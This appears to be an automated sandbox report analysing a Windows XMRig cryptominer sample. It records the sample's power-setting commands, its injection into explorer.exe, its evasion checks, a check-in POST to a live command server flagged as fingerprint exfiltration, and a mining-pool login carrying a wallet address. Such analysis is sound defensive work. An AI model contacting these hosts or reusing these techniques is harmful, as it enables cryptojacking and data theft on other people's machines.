Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
88aext0k.exe

Overview

General Information

Sample name:88aext0k.exe
Analysis ID:1577340
MD5:3d375d10b594f69c51b80948ec0e4c03
SHA1:439779b78363df27d5874efb256aa5e415e0b8b3
SHA256:8f861c2089520549eb6c1eb3cba713a8316ffe9f3573199e27cb48bd5e1ca704
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
DNS related to crypt mining pools
Detected Stratum mining protocol
Injects code into the Windows Explorer (explorer.exe)
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • 88aext0k.exe (PID: 2800 cmdline: "C:\Users\user\Desktop\88aext0k.exe" MD5: 3D375D10B594F69C51B80948EC0E4C03)
    • powercfg.exe (PID: 5144 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3944 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4256 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5240 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 572 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Process Memory Space: explorer.exe PID: 572JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

        Change of critical system settings

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\88aext0k.exe", ParentImage: C:\Users\user\Desktop\88aext0k.exe, ParentProcessId: 2800, ParentProcessName: 88aext0k.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5144, ProcessName: powercfg.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T12:09:05.489486+010020446971A Network Trojan was detected192.168.2.549705185.215.113.21780TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T12:10:05.130208+010020510042Crypto Currency Mining Activity Detected192.168.2.549812185.215.113.21780TCP
        2024-12-18T12:11:04.386796+010020510042Crypto Currency Mining Activity Detected192.168.2.549944185.215.113.21780TCP
        2024-12-18T12:12:04.632406+010020510042Crypto Currency Mining Activity Detected192.168.2.549980185.215.113.21780TCP
        2024-12-18T12:13:06.004768+010020510042Crypto Currency Mining Activity Detected192.168.2.549981185.215.113.21780TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-18T12:08:54.301927+010028269302Crypto Currency Mining Activity Detected192.168.2.549704104.238.180.20710300TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://185.215.113.217/Deliberate/api/endpoint.phpEAvira URL Cloud: Label: phishing
        Source: http://185.215.113.217/Deliberate/api/endpoint.phpvdxneboafwevufevAvira URL Cloud: Label: phishing
        Source: http://185.215.113.217/Deliberate/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=5--cinit-idAvira URL Cloud: Label: phishing
        Source: http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csvAvira URL Cloud: Label: phishing
        Source: http://185.215.113.217Avira URL Cloud: Label: phishing
        Source: http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csvcAvira URL Cloud: Label: phishing
        Source: http://185.215.113.217/Deliberate/api/endpoint.phpAvira URL Cloud: Label: phishing
        Source: 88aext0k.exeReversingLabs: Detection: 73%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

        Bitcoin Miner

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 572, type: MEMORYSTR
        Source: unknownDNS query: name: xmr-us-west1.nanopool.org
        Source: global trafficTCP traffic: 192.168.2.5:49704 -> 104.238.180.207:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"86bluj7oduf2wu65eho3kwc6fbm8x4bghxvgrkrh5wzvkgtf4tfqrwtmj2qtae4mu7p2kdwngpzrgpd3ckgenxvgmt5r4sp","pass":"x","agent":"xmrig/6.21.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
        Source: 88aext0k.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmp, ztaigjkbyfjh.sys.0.dr

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.5:49705 -> 185.215.113.217:80
        Source: C:\Windows\explorer.exeNetwork Connect: 104.238.180.207 10300Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 185.215.113.217 80Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.5:49704 -> 104.238.180.207:10300
        Source: Joe Sandbox ViewIP Address: 185.215.113.217 185.215.113.217
        Source: Joe Sandbox ViewIP Address: 185.215.113.217 185.215.113.217
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
        Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49812 -> 185.215.113.217:80
        Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49981 -> 185.215.113.217:80
        Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49944 -> 185.215.113.217:80
        Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.5:49980 -> 185.215.113.217:80
        Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 104.238.180.207:10300
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.217
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: xmr-us-west1.nanopool.org
        Source: unknownHTTP traffic detected: POST /Deliberate/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 306Content-Type: application/jsonHost: 185.215.113.217User-Agent: cpp-httplib/0.12.6
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Deliberate/api/endpoint.php
        Source: explorer.exe, 00000009.00000002.4533205171.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Deliberate/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=5--cinit-id
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Deliberate/api/endpoint.phpE
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csv
        Source: explorer.exe, 00000009.00000003.2075334619.00000000006A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Deliberate/api/endpoint.phpmsi.csvc
        Source: explorer.exe, 00000009.00000003.2063381261.0000000000672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.217/Deliberate/api/endpoint.phpvdxneboafwevufev
        Source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmp, ztaigjkbyfjh.sys.0.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmp, ztaigjkbyfjh.sys.0.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmp, ztaigjkbyfjh.sys.0.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
        Source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmp, ztaigjkbyfjh.sys.0.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0

        System Summary

        barindex
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\88aext0k.exeFile created: C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sysJump to behavior
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: 88aext0k.exe, 00000000.00000003.2059971991.0000013D8D7C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs 88aext0k.exe
        Source: ztaigjkbyfjh.sys.0.drBinary string: \Device\WinRing0_1_2_0
        Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@15/1@1/2
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
        Source: C:\Users\user\Desktop\88aext0k.exeFile created: C:\Users\user\AppData\Local\Temp\ztaigjkbyfjh.sysJump to behavior
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\88aext0k.exeProcess created: C:\Windows\explorer.exeJump to behavior
        Source: 88aext0k.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
